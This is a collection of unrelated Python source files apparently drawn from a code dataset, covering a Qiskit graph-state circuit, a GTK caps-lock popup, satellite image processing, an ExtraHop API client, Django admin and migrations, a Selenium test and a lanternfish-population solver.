| content | origin | type |
|---|---|---|
| stringlengths 0 to 1.05M | stringclasses 2 values | stringclasses 2 values |
from networkx.algorithms import bipartite
from qiskit import ClassicalRegister, QuantumRegister, QuantumCircuit
class BipartiteGraphState(QuantumCircuit):
def __init__(self, bipartite_graph):
super().__init__()
self.graph = bipartite_graph
# Create a quantum register based on the number of nodes
# in W + the number of nodes in B (= total number of nodes in G)
self.white_nodes, self.black_nodes = bipartite.sets(self.graph)
self.qreg = QuantumRegister(len(self.black_nodes) + len(self.white_nodes))
self.creg = ClassicalRegister(len(self.black_nodes) + len(self.white_nodes))
# Create a circuit using the quantum register
self.circuit = QuantumCircuit(self.qreg, self.creg)
        # Build a mapping from graph nodes to qubit indices first, so that
        # gates work even when nodes are not labeled 0..n-1
        self.node_dict = self.build_node_dict()
        # For each vertex in W, apply a Hadamard gate
        for vertex in self.white_nodes:
            self.circuit.h(self.node_dict[vertex])
        # For each vertex in B, apply a Hadamard gate
        for vertex in self.black_nodes:
            self.circuit.h(self.node_dict[vertex])
        # For each edge e={x,y}, apply a controlled-Z gate on its vertices
        for x, y in self.graph.edges:
            self.circuit.cz(self.node_dict[x], self.node_dict[y])
    def build_node_dict(self):
        """
        Build and return a dictionary mapping each graph node to the integer
        index of its qubit in the Qiskit circuit.
        """
        node_dict = dict()
        for count, node in enumerate(self.graph.nodes):
            node_dict[node] = count
        return node_dict
def x_measurement(self, qubit, cbit):
"""Measure 'qubit' in the X-basis, and store the result in 'cbit'"""
self.circuit.h(qubit)
self.circuit.measure(qubit, cbit)
self.circuit.h(qubit)
    def x_measure_white(self):
        """
        Measure the black qubits in the computational (Z) basis, then the
        white qubits in the Pauli X-basis.
        """
        self.circuit.barrier()
        for vertex in self.black_nodes:
            index = self.node_dict[vertex]
            self.circuit.measure(index, index)
        self.circuit.barrier()
        for vertex in self.white_nodes:
            index = self.node_dict[vertex]
            self.x_measurement(index, index)
    def x_measure_black(self):
        """
        Measure the white qubits in the computational (Z) basis, then the
        black qubits in the Pauli X-basis.
        """
        self.circuit.barrier()
        for vertex in self.white_nodes:
            index = self.node_dict[vertex]
            self.circuit.measure(index, index)
        self.circuit.barrier()
        for vertex in self.black_nodes:
            index = self.node_dict[vertex]
            self.x_measurement(index, index)
    def apply_stabilizer(self, node):
        """
        Apply the stabilizer generator corresponding to node.
        :param node: a node in self.graph
        """
self.circuit.x(self.node_dict[node])
for neighbor in self.graph.neighbors(node):
self.circuit.z(self.node_dict[neighbor])
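
# Minimal usage sketch (assumes networkx and qiskit are installed; the path
# graph below is connected and bipartite, so bipartite.sets() succeeds on it):
if __name__ == '__main__':
    import networkx as nx
    graph = nx.path_graph(4)
    state = BipartiteGraphState(graph)
    state.x_measure_white()
    print(state.circuit.draw())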
|
nilq/baby-python
|
python
|
# pylint: disable=no-name-in-module
from collections import deque
from typing import Deque
from pydantic import BaseModel
from ..core.constants import Interval
from .timeframe import TimeFrame
class Window(BaseModel):
"""Holds a sequence of timeframes and additional metadata."""
interval: Interval
timeframes: Deque[TimeFrame] = deque()
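# Usage sketch (the Interval member and TimeFrame constructor below are
# assumptions; both come from the sibling modules imported above):
#   window = Window(interval=Interval.MINUTE)
#   window.timeframes.append(TimeFrame(...))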
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository import GLib
# keyboard lib
from pynput.keyboard import Key, Listener, Controller
# capslock status
from capslock_status import status
# pop up time in ms
time = 700
# get capslock status
is_capslock_on = status.get_capslock_status()
# build the pop-up window that indicates caps lock is ON
def show_on():
# build interfaces
builder = Gtk.Builder()
builder.add_from_file("interfaces/on.glade")
window = builder.get_object("capslock-on")
return window
# build the pop-up window that indicates caps lock is OFF
def show_off():
# build interfaces
builder = Gtk.Builder()
builder.add_from_file("interfaces/off.glade")
window = builder.get_object("capslock-off")
return window
# listen keyboard
keyboard = Controller()
# custom exception
class MyException(Exception):
pass
def on_press(key):
    # global caps-lock state shared with the pynput callback
    global is_capslock_on
    # exit the keyboard listener on Escape
    if key == Key.esc:
        raise MyException(key)
    # ignore every key except caps lock
    if key != Key.caps_lock:
        return
    if not is_capslock_on:
        window = show_on()
        is_capslock_on = True
    else:
        window = show_off()
        is_capslock_on = False
    # show the window, then hide it after the given pop-up time
    window.show_all()
    GLib.timeout_add(time, window.hide)
    # connect destroy event
    window.connect("destroy", Gtk.main_quit)
    # quit the nested Gtk main loop after the pop-up time
    GLib.timeout_add(time, Gtk.main_quit)
    Gtk.main()
# create keyboard listener
with Listener(on_press=on_press) as listener:
listener.join()
|
nilq/baby-python
|
python
|
from mix import save_color_image, brightness_limitization
import os
import shutil
from argparse import ArgumentParser
import json
from utils import change_datatype
from utils import timestamp_to_datetime
from utils import Bands
def parse_arguments():
parser = ArgumentParser(description='Create colored images and collect'
'into folder.',
epilog='python color_images.py ./downloads')
parser.add_argument('directory', help='directory for images.')
parser.add_argument('-c', '--collect', help='directory to collect images.',
default=None)
parser.add_argument('--collect-only', help="collect only",
action='store_true')
    parser.add_argument('-b', '--bright-limit', type=int,
                        help='Supremum of channel brightness.',
                        default=3500)
return parser.parse_args()
def color_images(directory, bright_limit=3500):
"""
    Search leaf folders in <directory> and create colored images
    :param directory: str, directory where to look
    :param bright_limit: int, supremum of channel brightness
"""
for root, dirs, files in os.walk(directory):
if len(dirs) == 0:
try:
product_dir = os.path.split(os.path.normpath(root))[0]
# open information about product
                with open(os.path.join(product_dir, 'info.json'), 'r') as f:
                    info = json.load(f)
sentinel = info['Satellite']
if sentinel == 'Sentinel-2':
print('Coloring ' + root + '...')
save_color_image(root, Bands.RED, Bands.GREEN, Bands.BLUE,
'TCI1', bright_limit)
elif sentinel == 'Sentinel-1':
print('Changing DType to uint8 ' + root + '...')
for file in files:
if 'uint8' in file:
continue
new_file = os.path.splitext(file)[0] + '_uint8' + \
os.path.splitext(file)[1]
                        change_datatype(
                            os.path.join(root, file),
                            os.path.join(root, new_file),
                            processor=lambda x: brightness_limitization(x, 255))
print('\tuint8 file: ' + new_file)
else:
print('Unknown satellite')
except Exception as e:
print('Error: ' + 'Path: ' + root + '\n' + str(e))
def collect_images(search_directory, target='./colored'):
"""
Search colored images in <search_directory> and copy them
into target directory
    :param search_directory: str, directory to search images
:param target: str, directory to copy images
"""
for root, dirs, files in os.walk(search_directory):
for file in files:
if 'TCI1' in file or 'uint8' in file:
file_hint = ' '.join([os.path.splitext(file)[0]] +
os.path.normpath(root).split(os.sep)[-2:])
product_dir = os.path.split(os.path.normpath(root))[0]
# open information about product
                with open(os.path.join(product_dir, 'info.json'), 'r') as f:
                    info = json.load(f)
sensing_start = timestamp_to_datetime(info['Sensing start'])
new_file = info['Satellite'] + \
' {:%Y-%m-%d %H:%M} '.format(sensing_start) + \
file_hint + '.tiff'
shutil.copy(os.path.join(root, file),
os.path.join(target, new_file))
if __name__ == '__main__':
args = parse_arguments()
if args.collect_only is False:
print('Coloring images in ' + args.directory)
color_images(args.directory, args.bright_limit)
if args.collect is not None:
print('Collecting files into ' + args.collect)
if os.path.isdir(args.collect) is False:
os.mkdir(args.collect)
collect_images(args.directory, args.collect)
|
nilq/baby-python
|
python
|
def deleteWhitespaces(inputStr):
    # str.split() with no argument splits on any whitespace run, so joining
    # the pieces removes spaces, tabs and newlines alike
    nonWhitespaces = inputStr.split()
    return ''.join(nonWhitespaces)
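# e.g. deleteWhitespaces('a b\tc\nd') -> 'abcd'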
|
nilq/baby-python
|
python
|
"""Graph implementation using adjacency lists."""
from __future__ import annotations
from dataclasses import dataclass, field
from typing import Any, Dict, Set, Optional, Union, Tuple
from collections.abc import Iterable
@dataclass
class Node:
"""This class can be used standalone or with a Graph
(if fast access to the list of all nodes is required)
"""
value: Any
    # Maps adjacent node to edge weight
adjacent: Dict[Node, int] = field(default_factory=dict)
def edge(self, other: Node, weight: int = 1, rev_weight: Optional[int] = None):
"""Don't forget to call Graph.add_node() if you are using a Graph class."""
self.adjacent[other] = weight
other.adjacent[self] = weight if rev_weight is None else rev_weight
def __hash__(self) -> int:
"""Every node is unique, we cannot have node equality."""
return id(self)
@dataclass
class Graph:
nodes: Set[Node] = field(default_factory=set)
@staticmethod
def _normalize_node(node: Any) -> Node:
if isinstance(node, Node):
return node
return Node(node)
def add_node(self, node: Any, adjacent: Iterable[Node] = ()) -> Node:
node = self._normalize_node(node)
self.nodes.add(node)
for adj_node in adjacent:
node.edge(adj_node)
return node
    def add_node_weights(
        self,
        node: Any,
        adjacent: Optional[Dict[Node, Union[int, Tuple[int, int]]]] = None,
    ) -> Node:
        node = self._normalize_node(node)
        self.nodes.add(node)
        for adj_node, weight in (adjacent or {}).items():
            if isinstance(weight, tuple):
                node.edge(adj_node, *weight)
            else:
                node.edge(adj_node, weight)
        return node
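
# Minimal usage sketch (example values are assumptions, not part of the module):
if __name__ == '__main__':
    g = Graph()
    a = g.add_node('a')
    b = g.add_node('b', adjacent=[a])               # undirected edge a-b, weight 1
    c = g.add_node_weights('c', {a: 2, b: (3, 4)})  # c-b edge with weights 3 (c->b) and 4 (b->c)
    print(len(g.nodes), a.adjacent[b], c.adjacent[b], b.adjacent[c])  # 3 1 3 4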
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""Wrapper for API calls to ExtraHop."""
# COPYRIGHT 2020 BY EXTRAHOP NETWORKS, INC.
#
# This file is subject to the terms and conditions defined in
# file 'LICENSE', which is part of this source code package.
# This file is part of an ExtraHop Supported Integration. Make NO MODIFICATIONS below this line
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class ExtraHopClient(object):
"""
ExtraHopClient is a simple wrapper around Requests.Session to save authentication and
connection data.
"""
def __init__(self, host, api_key, verify_certs=False):
self.host = host
self.session = requests.Session()
self.session.headers = {
"Accept": "application/json",
"Authorization": f"ExtraHop apikey={api_key}",
}
self.session.verify = verify_certs
def get(self, path):
"""Send GET request to ExtraHop API."""
return self._api_request("get", path)
def post(self, path, data=None, json=None):
"""Send POST request to ExtraHop API."""
return self._api_request("post", path, data, json)
def patch(self, path, data=None, json=None):
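        """Send PATCH request to ExtraHop API."""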
return self._api_request("patch", path, data, json)
def delete(self, path):
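        """Send DELETE request to ExtraHop API."""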
return self._api_request("delete", path)
def _api_request(self, method, path, data=None, json=None):
"""Handle API requests to ExtraHop API."""
url = f"https://{self.host}/api/v1/{path}"
if method == "get":
rsp = self.session.get(url)
elif method == "post":
rsp = self.session.post(url, data=data, json=json)
elif method == "patch":
rsp = self.session.patch(url, data=data, json=json)
elif method == "delete":
rsp = self.session.delete(url)
else:
raise ValueError("Unsupported HTTP method {}".format(method))
rsp.raise_for_status()
return rsp
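
# Usage sketch (the host, API key and endpoint below are placeholders, not
# values from this module; consult the ExtraHop API docs for real endpoints):
#   client = ExtraHopClient("extrahop.example.com", api_key="...")
#   devices = client.get("devices").json()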
|
nilq/baby-python
|
python
|
from setuptools import setup
DESCRIPTION = ('Python interface to the Refinitiv Datastream (former Thomson '
'Reuters Datastream) API via Datastream Web Services (DSWS)')
# Long description to be published in PyPi
LONG_DESCRIPTION = """
**PyDatastream** is a Python interface to the Refinitiv Datastream (former Thomson
Reuters Datastream) API via Datastream Web Services (DSWS) (non free),
with some convenience functions. This package requires valid credentials for this
API.
For the documentation please refer to README.md inside the package or on the
GitHub (https://github.com/vfilimonov/pydatastream/blob/master/README.md).
"""
_URL = 'http://github.com/vfilimonov/pydatastream'
__version__ = __author__ = __email__ = None # will be extracted from _version.py
exec(open('pydatastream/_version.py').read()) # defines __version__ pylint: disable=W0122
setup(name='PyDatastream',
version=__version__,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
url=_URL,
download_url=_URL + '/archive/v' + __version__ + '.zip',
author=__author__,
author_email=__email__,
license='MIT License',
packages=['pydatastream'],
install_requires=['requests'],
extras_require={
'pandas': ['pandas'],
},
classifiers=['Programming Language :: Python :: 3'],
)
|
nilq/baby-python
|
python
|
from django.conf import settings
from django.contrib import admin
from django.template.response import TemplateResponse
from django.urls import path, resolve, reverse
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.views.generic import View
from constance import config
class AdminBaseContextMixin:
def get_context_data(self, **kwargs):
context = super().get_context_data(title=self._admin_title, **kwargs)
context.update(admin.site.each_context(self.request))
return context
class CrazyArmsAdminSite(admin.AdminSite):
AdminBaseContextMixin = AdminBaseContextMixin
index_title = ""
empty_value_display = mark_safe("<em>none</em>")
site_url = None
nginx_proxy_views = (("View server logs", "/logs/", "common.view_logs"),)
if settings.ZOOM_ENABLED:
nginx_proxy_views += (("Administer Zoom over VNC", "/zoom/vnc/", "common.view_websockify"),)
if settings.HARBOR_TELNET_WEB_ENABLED:
nginx_proxy_views += (
(
"Liquidsoap harbor telnet (experimental)",
"/telnet/",
"common.view_telnet",
),
)
@property
def site_title(self):
return format_html("{} — Station Admin", config.STATION_NAME)
site_header = site_title
def __init__(self, *args, **kwargs):
self.extra_urls = []
super().__init__(*args, **kwargs)
def app_index_extra(self, request):
return TemplateResponse(
request,
self.index_template or "admin/app_index_extra.html",
{
**self.each_context(request),
"title": "Miscellaneous Configuration administration",
"app_list": False,
},
)
def app_index(self, request, app_label, extra_context=None):
return super().app_index(
request,
app_label,
extra_context={**(extra_context or {}), "extra_urls": []},
)
def each_context(self, request):
context = super().each_context(request)
current_url_name = resolve(request.path_info).url_name
is_extra_url = False
extra_urls = []
# Registered views
for title, pattern, permission in self.extra_urls:
if permission is None or request.user.has_perm(permission):
extra_urls.append((title, reverse(f"admin:{pattern.name}"), False))
if current_url_name == pattern.name:
is_extra_url = True
for title, url, permission in self.nginx_proxy_views:
if request.user.has_perm(permission):
extra_urls.append((title, url, True))
context.update(
{
"current_url_name": current_url_name,
"extra_urls": sorted(extra_urls),
"is_extra_url": is_extra_url,
}
)
return context
def register_view(self, route, title, kwargs=None, name=None):
if name is None:
name = route.replace("/", "").replace("-", "_")
def register(cls_or_func):
cls_or_func._admin_title = title
            is_class_view = isinstance(cls_or_func, type) and issubclass(cls_or_func, View)
            view = cls_or_func.as_view() if is_class_view else cls_or_func
            pattern = path(
                route=f"settings/{route}",
                view=self.admin_view(view),
                kwargs=kwargs,
                name=name,
            )
permission = getattr(cls_or_func, "permission_required", None)
self.extra_urls.append((title, pattern, permission))
return cls_or_func
return register
def get_urls(self):
return (
[
path(
"settings/",
view=self.admin_view(self.app_index_extra),
name="app_index_extra",
)
]
+ [pattern for _, pattern, _ in self.extra_urls]
+ super().get_urls()
)
|
nilq/baby-python
|
python
|
from robo_navegador import *
from dados_ritmistas import ler_dados
from alterar_docs import *
nomes = ('Matheus Delaqua Rocha De Jesus',
'Cecília')
if __name__ == '__main__':
renomear(nome_atual_pasta='Credenciamento TABU (File responses)')
mover(path=('Arquivo do Documento (File responses)', 'Comprovante de Matrícula (File responses)'))
site = Navegador()
site.logar('amandaturno@usp.br', 'asequith')
lista = ler_dados()
for pessoa in lista:
        if 'Arquivo não encontrado\n' not in (pessoa.arquivo_doc, pessoa.comprovante):
if pessoa.nome not in nomes:
site.cadastrar_ritmista(pessoa)
sleep(5)
else:
print(f'\033[1;7;30mPulando {pessoa.nome}...\033[m')
print(f'\033[1;7;30mPrograma finalizado, {site.contador} ritmistas cadastrados\033[m')
|
nilq/baby-python
|
python
|
import argparse
from pathlib import Path
from event_types import event_types
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=(
            'Train event class models. '
'Results are saved in the models directory.'
)
)
args = parser.parse_args()
n_types = 3
start_from_DL2 = False
if start_from_DL2:
# Prod3b
# dl2_file_name = (
# '/lustre/fs21/group/cta/users/maierg/analysis/AnalysisData/uploadDL2/'
# 'Paranal_20deg/gamma_onSource.S.3HB9-FD_ID0.eff-0.root'
# )
# Prod5
dl2_file_name = (
'/lustre/fs22/group/cta/users/maierg/analysis/AnalysisData/'
'prod5-Paranal-20deg-sq08-LL/EffectiveAreas/'
'EffectiveArea-50h-ID0-NIM2LST2MST2SST2SCMST2-g20210921-V3/BDT.DL2.50h-V3.g20210921/'
'gamma_onSource.S.BL-4LSTs25MSTs70SSTs-MSTF_ID0.eff-0.root'
)
dtf = event_types.extract_df_from_dl2(dl2_file_name)
else:
dtf = event_types.load_dtf()
dtf_e = event_types.bin_data_in_energy(dtf)
labels, train_features = event_types.nominal_labels_train_features()
dtf_e = event_types.add_event_types_column(dtf_e, labels)
dtf_e_train, dtf_e_test = event_types.split_data_train_test(dtf_e)
all_models = event_types.define_classifiers()
selected_models = [
'MLP_classifier',
# 'MLP_relu_classifier',
# 'MLP_logistic_classifier',
# 'MLP_uniform_classifier',
# 'BDT_classifier',
# 'random_forest_classifier',
# 'ridge_classifier',
# # 'ridgeCV_classifier', # unnecessary, same as the ridge classifier
# 'SVC_classifier', # Fails to evaluate for some reason, all SVC based fail
# 'SGD_classifier',
# 'Gaussian_process_classifier', # Takes forever to train
# 'bagging_svc_classifier', # Fails to evaluate for some reason, all SVC based fail
# 'bagging_dt_classifier',
# 'oneVsRest_classifier', # Fails to evaluate for some reason
# 'gradient_boosting_classifier',
]
models_to_train = dict()
for this_model in selected_models:
this_model_name = '{}_ntypes_{:d}'.format(this_model, n_types)
models_to_train[this_model_name] = dict()
models_to_train[this_model_name]['train_features'] = train_features
models_to_train[this_model_name]['labels'] = 'event_type_{:d}'.format(n_types)
models_to_train[this_model_name]['model'] = all_models[this_model]
models_to_train[this_model_name]['test_data_suffix'] = 'classification'
trained_models = event_types.train_models(
dtf_e_train,
models_to_train
)
event_types.save_models(trained_models)
event_types.save_test_dtf(dtf_e_test, 'classification')
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2020 LG Electronics Inc.
SPDX-License-Identifier: MIT
"""
import argparse
import copy
import logging
import os
import sys
import textwrap
from .tool_wrapper import get_tool_list, get_tool_wrapper, load_tools
from .context import WrapperContext
from .report import Report
from texttable import Texttable
LOGGER = logging.getLogger('SAGE')
def run_tools(ctx):
for toolname in get_tool_list():
option = ctx.get_tool(toolname)
if option is not None:
wrapper = get_tool_wrapper(toolname)(toolname, option)
if wrapper.get_tool_path(ctx) is None:
LOGGER.warning("* %s is not installed!!!", toolname)
continue
LOGGER.info("* %s is running...", toolname)
wrapper.run(ctx)
run_tools.__annotations__ = {'ctx': WrapperContext}
def generate_report(ctx, args_dict):
report = Report(ctx, args_dict)
table = Texttable(max_width=0)
table.set_deco(Texttable.HEADER | Texttable.BORDER | Texttable.VLINES)
table.add_rows(report.get_summary_table())
print(table.draw())
if ctx.output_path:
report.write_to_file(os.path.join(ctx.output_path, "sage_report.json"))
generate_report.__annotations__ = {'ctx': WrapperContext, 'args_dict': dict}
def main():
parser = argparse.ArgumentParser(
description="Static Analysis Group Execution",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--source-path", help="source path")
parser.add_argument("--build-path", help="build path")
parser.add_argument(
"--tool-path", help="if this option is specified, only tools in this path is executed")
parser.add_argument("--output-path", help="output path")
parser.add_argument("--exclude-path", help="exclude path")
parser.add_argument("--target-triple", help="compile target triple")
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
parser.add_argument(
"tools", nargs="*", help=textwrap.dedent("""\
List of tools.
Tool-specific command-line options separated by colons can be added after the tool name.
ex) 'cppcheck:--library=googletest'"""),
default=["cppcheck", "cpplint", "duplo", "metrix++"])
args = parser.parse_args()
args_dict = copy.deepcopy(vars(args))
default_exclude_path = " .git"
if args.exclude_path:
args.exclude_path += default_exclude_path
else:
args.exclude_path = default_exclude_path
log_level = logging.DEBUG if args.verbose else logging.WARNING
logging.basicConfig(stream=sys.stdout, level=log_level)
# load wrapper
LOGGER.info("load wrapper")
load_tools()
# make WrapperContext
ctx = WrapperContext(
args.tools, args.source_path, args.build_path, args.tool_path,
args.output_path, args.target_triple, args.exclude_path)
if not ctx.proj_file_exists():
LOGGER.error("There is no 'compile_commands.json'")
LOGGER.info("run tools")
run_tools(ctx)
# generate report
LOGGER.info("reporting")
generate_report(ctx, args_dict)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
from sqlalchemy import (
    create_engine,
MetaData, Table,
Column, Integer, Sequence,
String, ForeignKey, DateTime,
select, delete, insert, update, func
)
from sqlalchemy.sql import and_
from tornado import concurrent, ioloop
import datetime
import tornado
import sqlite3
#from concurrent.futures import ThreadPoolExecutor
metadata = MetaData()
tables = {
'servers': Table('servers', metadata,
Column('id', Integer(), Sequence('servers_id_seq'), primary_key=True, index=True),
Column('name', String(20), nullable=False, unique=True, index=True),
Column('address', String(16), nullable=False),
Column('port', String(10), nullable=False)),
'servers_logs': Table('servers_logs', metadata,
Column('id', Integer(), Sequence('servers_logs_id_seq'), primary_key=True, index=True),
Column('server_id', Integer(), nullable=False, index=True),
Column('time', DateTime, nullable=False),
Column('text', String(1024), nullable=False)),
'users': Table('users', metadata,
Column('id', Integer(), Sequence('users_id_seq'), primary_key=True, index=True)),
'servers_events': Table('servers_events', metadata,
Column('id', Integer(), Sequence('servers_events_seq'), primary_key=True, index=True),
Column('user_id', Integer(), nullable=False, index=True),
Column('server_id', Integer(), nullable=False, index=True),
Column('text', String(1024), nullable=False)),
'events_occured': Table('events_occured', metadata,
Column('event_id', Integer(), index=True),
Column('log_id', Integer(), index=True))
}
class DBHandler():
#executor = ThreadPoolExecutor(max_workers=4)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.io_loop = ioloop.IOLoop.current()
self.engine = create_engine('sqlite:///database.db')
self.conn = self.engine.connect()
def shutdb(self):
        self.conn.close()
self.io_loop = None
self.engine = None
self.conn = None
    # SQLite connections can't be used across threads, so this feature is
    # temporarily disabled.
    #@concurrent.run_on_executor
def execute(self, query, *args):
return self.conn.execute(query)
def init_db():
'''
Fill db with initial environment.
'''
#engine = create_engine('postgresql://idfumg:qwerty@localhost/logmonitor_db')
engine = create_engine('sqlite:///database.db')
metadata.create_all(engine)
conn = engine.connect()
transaction = conn.begin()
conn.execute(delete(tables['servers_logs']))
conn.execute(delete(tables['servers']))
conn.execute(delete(tables['servers_events']))
conn.execute(delete(tables['users']))
conn.execute(delete(tables['events_occured']))
now = datetime.datetime.now()
servers = [
{'name': 'ГРТ', 'address': '192.168.1.1', 'port': '67890'},
{'name': 'ГРС', 'address': '192.168.1.2', 'port': '54321'},
{'name': 'TST', 'address': '192.168.1.3', 'port': '12345'}
]
conn.execute(insert(tables['servers']), servers)
servers_logs = []
for i in range(1000):
servers_logs.append({'server_id': 1, 'time': now, 'text': 'HTTPSRV МОВАПУ Warning! Unexpected behaviour! ' + str(i)})
for i in range(500):
servers_logs.append({'server_id': 1, 'time': now, 'text': 'search test ' + str(i)})
# for i in range(500):
# servers_logs.append({'name': 'ГРТ', 'time': now - datetime.timedelta(days=i), 'text': 'search test ' + str(i)})
grs_servers_logs = []
for i in range(10):
grs_servers_logs.append({'server_id': 2, 'time': now + datetime.timedelta(days=1), 'text': 'HTTPSRV МОВАПУ Warning! my own unexpected error! ' + str(i)})
events = [
{'user_id': 1, 'text': 'unexpected', 'server_id': 1},
{'user_id': 1, 'text': 'httpsrv', 'server_id': 1},
{'user_id': 1, 'text': 'error', 'server_id': 2},
]
conn.execute(insert(tables['servers_logs']), servers_logs)
conn.execute(insert(tables['servers_logs']), grs_servers_logs)
conn.execute(insert(tables['servers_events']), events)
print('database filled')
cursor = conn.execute(select([tables['servers']]))
servers = [server[1] for server in cursor]
transaction.commit()
conn.close()
return servers
|
nilq/baby-python
|
python
|
inp = open("input/day6.txt", "r")
prvotne_ribe = [int(x) for x in inp.readline().split(",")]
inp.close()
prvotna_populacija = [0 for _ in range(9)]
for riba in prvotne_ribe:
prvotna_populacija[riba] += 1
def zivljenje(N):
    populacija = prvotna_populacija[:]  # copy, so the global list is never aliased
for _ in range(N):
nova_populacija = [0 for _ in range(9)]
for k in range(9):
if k == 0:
nova_populacija[8] += populacija[k]
nova_populacija[6] += populacija[k]
else:
nova_populacija[k-1] += populacija[k]
populacija = nova_populacija
return sum(populacija)
# --------------------------
print("1. del: ")
print(zivljenje(80))
print("2. del: ")
print(zivljenje(256))
|
nilq/baby-python
|
python
|
import sys
import pandas as pd
import matplotlib.pyplot as plt
def main():
dfpath = 'nr_dataframes/final.pkl'
df = pd.read_pickle(dfpath)
    # filter rows before plotting so the histogram reflects the cut
    df = df[df[show] > 400]
    df.hist(column='length', bins=100)
    plt.show()
if __name__=="__main__":
show = sys.argv[1]
main()
|
nilq/baby-python
|
python
|
from selenium import webdriver
import datetime
from . import helper
class NewVisitorTest(helper.FunctionalTestBase):
def setUp(self):
self.browser = webdriver.Firefox()
self.data = {
"dhuha": "4",
"tilawah_from": "1",
"tilawah_to": "20",
"ql": "5",
"shaum": "Iya",
"date": datetime.datetime.now().strftime("%Y-%m-%d")
}
def tearDown(self):
self.delete_item_by_date(self.data["date"])
self.logout()
self.browser.quit()
#region helper methods
def assert_data_saved_correctly(self):
dhuha_display = self.browser.find_element_by_xpath("//table[@id='table-mutaaba3ah-item']/tbody/tr[td='Dhuha']/td[2]")
self.assertIn(self.data["dhuha"], dhuha_display.text)
ql_display = self.browser.find_element_by_xpath("//table[@id='table-mutaaba3ah-item']/tbody/tr[td='Qiyamul Lail']/td[2]")
self.assertIn(self.data["ql"], ql_display.text)
shaum_display = self.browser.find_element_by_xpath("//table[@id='table-mutaaba3ah-item']/tbody/tr[td='Shaum']/td[2]")
self.assertIn(self.data["shaum"], shaum_display.text)
tilawah_display = self.browser.find_element_by_xpath("//table[@id='table-mutaaba3ah-item']/tbody/tr[td='Tilawah']/td[2]")
self.assertIn(self.data["tilawah_from"], tilawah_display.text)
self.assertIn(self.data["tilawah_to"], tilawah_display.text)
#endregion
def login_entrydata_searchreport_logout(self):
        # Brian hears about an online daily mutaba'ah (self-evaluation) app from a WA group
        # He tries to open the app's home page
self.browser.get("http://localhost:8000")
self.try_logout()
        # Brian sees no menus at all, only a link to log in
        self.assertEqual(len(self.browser.find_elements_by_id("user-email")), 0)
        self.assertEqual(len(self.browser.find_elements_by_id("logout")), 0)
        self.assertEqual(len(self.browser.find_elements_by_id("menu-entry")), 0)
        self.assertEqual(len(self.browser.find_elements_by_id("menu-report")), 0)
self.login()
        # After logging in, Brian sees menu links to the 'Entry' and 'Report' pages
        self.assertEqual(len(self.browser.find_elements_by_id("menu-entry")), 1)
        self.assertEqual(len(self.browser.find_elements_by_id("menu-report")), 1)
        # Brian opens the 'Report' page to confirm there is no data yet,
        # since this is the first time he has used this mutaba'ah app
self.navigate_to_report()
report_items = self.find_report_items_by_date()
        self.assertEqual(len(report_items), 0)
        # Brian then opens the 'Entry' page
        # and fills in the mutaba'ah data for today
self.navigate_to_entry()
self.create_or_edit_data(self.data)
        # After submitting, Brian sees a confirmation page showing the data
        # exactly as he entered it
self.assert_data_saved_correctly()
# error: AssertionError: u"4 raka'at" != '4'
        # Brian switches to the 'Report' page to make sure the data he just
        # submitted appears there
self.navigate_to_report()
report_items = self.find_report_items_by_date(self.data["date"])
        self.assertEqual(len(report_items), 1)
report_item = report_items[0]
        # Brian notices one of the inputs is wrong
        # and updates the Dhuha entry with the correct number
self.data["dhuha"] = "6"
report_item.click()
btn_edit = self.browser.find_element_by_id("edit")
btn_edit.click()
self.browser.switch_to.window(self.browser.window_handles[1])
self.create_or_edit_data(self.data)
        # After submitting, Brian sees a confirmation page showing the data
        # as last updated,
        # then closes the confirmation page
self.assert_data_saved_correctly()
self.browser.close()
self.browser.switch_to.window(self.browser.window_handles[0])
|
nilq/baby-python
|
python
|
# Generated by Django 2.0.6 on 2018-06-14 08:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('course', '0007_auto_20180613_2156'),
('voting', '0005_auto_20180613_2201'),
]
operations = [
migrations.CreateModel(
name='UserTaggingCourse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tag_date', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now=True)),
('tag_course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='course_tags', to='course.Course', verbose_name='Tagging course')),
('tagger', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Course Tagger')),
('tags', models.ManyToManyField(to='voting.Tags', verbose_name="User's tag(s) for this course")),
],
options={
'verbose_name_plural': 'User Reviews',
'verbose_name': 'User Review',
},
),
]
|
nilq/baby-python
|
python
|
# Generated by Django 3.2.9 on 2021-11-24 15:56
from django.db import migrations
EVENT_TYPES = (
(1, "CREATED", "Created the resourcing request"),
(2, "UPDATED", "Updated the resourcing request"),
(3, "SENT_FOR_APPROVAL", "Sent the resourcing request for approval"),
(4, "AMENDING", "Amending the resourcing request"),
(5, "SENT_FOR_REVIEW", "Sent the amendments for review"),
(6, "REVIEWED_AMENDMENTS", "Reviewed the amendments"),
(7, "GROUP_APPROVED", "A group approved the resourcing request"),
(8, "GROUP_REJECTED", "A group rejected the resourcing request"),
(9, "COMMENTED", "Somebody commented on the resourcing request"),
(10, "APPROVED", "The resourcing request was approved"),
)
def insert_event_types(apps, schema_editor):
EventType = apps.get_model("event_log", "EventType")
for pk, code, name in EVENT_TYPES:
EventType.objects.create(pk=pk, code=code, name=name)
def delete_event_types(apps, schema_editor):
EventType = apps.get_model("event_log", "EventType")
EventType.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
("main", "0027_auto_20211123_1605"),
("event_log", "0001_initial"),
]
operations = [migrations.RunPython(insert_event_types, delete_event_types)]
|
nilq/baby-python
|
python
|
from django.db import models
from django.contrib.auth.models import User
